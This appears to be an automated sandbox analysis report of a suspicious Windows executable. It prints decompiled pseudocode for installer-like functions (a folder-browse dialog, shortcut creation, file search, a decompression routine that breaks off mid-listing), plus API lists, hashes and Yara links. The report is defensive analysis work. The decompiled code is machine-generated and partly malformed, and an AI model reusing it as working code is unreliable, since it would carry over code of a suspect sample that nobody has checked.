                                            • lstrcatA.KERNEL32(?,TclpOwkq), ref: 00404434
                                            • SetDlgItemTextA.USER32 ref: 00404446
                                              • Part of subcall function 0040546C: GetDlgItemTextA.USER32 ref: 0040547F
                                              • Part of subcall function 00405E29: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\DN_467842234567.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E81
                                              • Part of subcall function 00405E29: CharNextA.USER32(?,?,?,00000000), ref: 00405E8E
                                              • Part of subcall function 00405E29: CharNextA.USER32(?,"C:\Users\user\Desktop\DN_467842234567.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E93
                                              • Part of subcall function 00405E29: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405EA3
                                            • GetDiskFreeSpaceA.KERNEL32(00429068,?,?,0000040F,?,00429068,00429068,?,00000001,00429068,?,?,000003FB,?), ref: 00404504
                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040451F
                                              • Part of subcall function 00404678: lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
                                              • Part of subcall function 00404678: wsprintfA.USER32 ref: 0040471E
                                              • Part of subcall function 00404678: SetDlgItemTextA.USER32 ref: 00404731
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: ]_$A$C:\Users\user\AppData\Local\Temp$TclpOwkq
                                            • API String ID: 2624150263-2239896730
                                            • Opcode ID: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
                                            • Instruction ID: 171edb992a826102812884c43759f415235567a44aa7ca021352bae990107689
                                            • Opcode Fuzzy Hash: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
                                            • Instruction Fuzzy Hash: 6CA16FB1900208ABDB11AFA5DC41BAF77B8EF84315F14803BF615B62D1D77C9A418F69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00402053, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 74%
                                            			E00402053() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A29(0xfffffff0);
				_t96 = E00402A29(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A29(2);
				 *((intOrPtr*)(_t100 - 0xc)) = E00402A29(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x38)) = E00402A29(0x45);
				if(E00405727(_t96) == 0) {
					E00402A29(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407504, _t75, 1, 0x4074f4, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407514, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\jones\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x18);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x18);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409438, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 8));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409438, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                            0x0040205c
                                            0x00402066
                                            0x0040206f
                                            0x00402079
                                            0x00402082
                                            0x0040208c
                                            0x00402090
                                            0x00402090
                                            0x00402095
                                            0x004020a6
                                            0x004020ae
                                            0x0040218e
                                            0x0040218e
                                            0x00402195
                                            0x004020b4
                                            0x004020b4
                                            0x004020c5
                                            0x004020c9
                                            0x004020cf
                                            0x004020d9
                                            0x004020db
                                            0x004020e6
                                            0x004020e9
                                            0x004020f6
                                            0x004020f8
                                            0x004020fa
                                            0x00402101
                                            0x00402104
                                            0x00402104
                                            0x00402107
                                            0x00402111
                                            0x00402119
                                            0x0040211e
                                            0x0040212a
                                            0x0040212a
                                            0x0040212d
                                            0x00402136
                                            0x00402139
                                            0x00402142
                                            0x00402147
                                            0x00402159
                                            0x00402168
                                            0x0040216a
                                            0x00402176
                                            0x00402176
                                            0x00402168
                                            0x00402178
                                            0x0040217e
                                            0x0040217e
                                            0x00402181
                                            0x00402187
                                            0x0040218c
                                            0x004021a1
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040218c
                                            0x00402197
                                            0x004028c1
                                            0x004028cd

                                            APIs
                                            • CoCreateInstance.OLE32(00407504,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020A6
                                            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409438,00000400,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp, xrefs: 004020DE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ByteCharCreateInstanceMultiWide
                                            • String ID: C:\Users\user\AppData\Local\Temp
                                            • API String ID: 123533781-47812868
                                            • Opcode ID: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
                                            • Instruction ID: 8f67ba42191d57eba63015a6e8d0bffc44353c0eb35145c2afa1481ff4163fd5
                                            • Opcode Fuzzy Hash: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
                                            • Instruction Fuzzy Hash: 2D414C75A00205BFCB00DFA8CD89E9E7BB6EF49354F204169FA05EB2D1CA799C41CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00402671, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 39%
                                            			E00402671(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A29(2), _t19 - 0x19c) != 0xffffffff) {
					E00405B25(__edi, _t6);
					_push(_t19 - 0x170);
					_push(__esi);
					E00405BC7();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                            0x00402689
                                            0x0040269d
                                            0x004026a8
                                            0x004026a9
                                            0x004027e4
                                            0x0040268b
                                            0x0040268b
                                            0x0040268d
                                            0x0040268f
                                            0x0040268f
                                            0x004028c1
                                            0x004028cd

                                            APIs
                                            • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FileFindFirst
                                            • String ID:
                                            • API String ID: 1974802433-0
                                            • Opcode ID: 210d19403dc9ad4312224203accd8d1f3ff27f6c6522c4c2c719f15252d079a4
                                            • Instruction ID: d100cd6159f555773fbda265320c1ac67d2490096a0530dc8ee4140695772295
                                            • Opcode Fuzzy Hash: 210d19403dc9ad4312224203accd8d1f3ff27f6c6522c4c2c719f15252d079a4
                                            • Instruction Fuzzy Hash: 24F0A0326081049ED711EBA99A499EEB778DB11328F6045BFE101B61C1C7B859459A3A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00406354, Relevance: .3, Instructions: 334COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 79%
                                            			E00406354(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E00406AC3( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x4073e8; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x4073e8; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E00406B2B( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M00406A83))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42dbb8;
												if( *0x42dbb8 != 0) {
													L22:
													_t412 =  *0x40942c; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x409430; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42ca34; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42ca30; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42ca38;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42ceb8;
													if(_t416 < 0x42ceb8) {
														L15:
														__eflags = _t416 - 0x42cc74;
														_t438 = 8;
														if(_t416 > 0x42cc74) {
															__eflags = _t416 - 0x42ce38;
															if(_t416 >= 0x42ce38) {
																__eflags = _t416 - 0x42ce98;
																if(_t416 < 0x42ce98) {
																	_t438 = 7;
																}
															} else {
